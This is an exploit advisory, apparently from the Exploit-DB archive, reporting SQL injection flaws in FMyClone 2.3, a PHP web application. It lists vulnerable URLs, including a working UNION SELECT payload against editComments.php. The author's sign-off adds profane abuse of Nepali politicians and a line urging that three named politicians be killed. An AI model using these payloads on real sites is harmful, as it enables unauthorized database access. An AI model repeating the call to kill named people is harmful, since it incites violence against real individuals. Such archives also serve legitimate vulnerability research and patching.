FMyClone 2.3 - Multiple SQL Injections

EDB-ID:

9711




Platform:

PHP

Date:

2009-09-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#####################################
#   FMyClone V2.3 Multiple SQLi     #
#   By learn3r hacker from nepal    #
#    damagicalhacker@gmail.com      #
#####################################

Product name: FMyClone
Version: 2.3 or maybe lower
Home: fmyclone.com

Different things might require some privileges to work but still sometimes these might be useful.

Vulns in the scripts:

http://localhost/exploit/FMyClone%20V2.3/index.php?comp=[SQLi/BSQL]

http://localhost/exploit/FMyClone V2.3/edit.php?act=comment&comp=2&id=[SQLi]
      //requires admin privilege

http://localhost/exploit/FMyClone%20V2.3/editComments.php?comp=1%27+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11--+

And maybe there are more vulns in the scripts but I don't have time to analyze (Dashain, Exams and all on the head).


Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-17]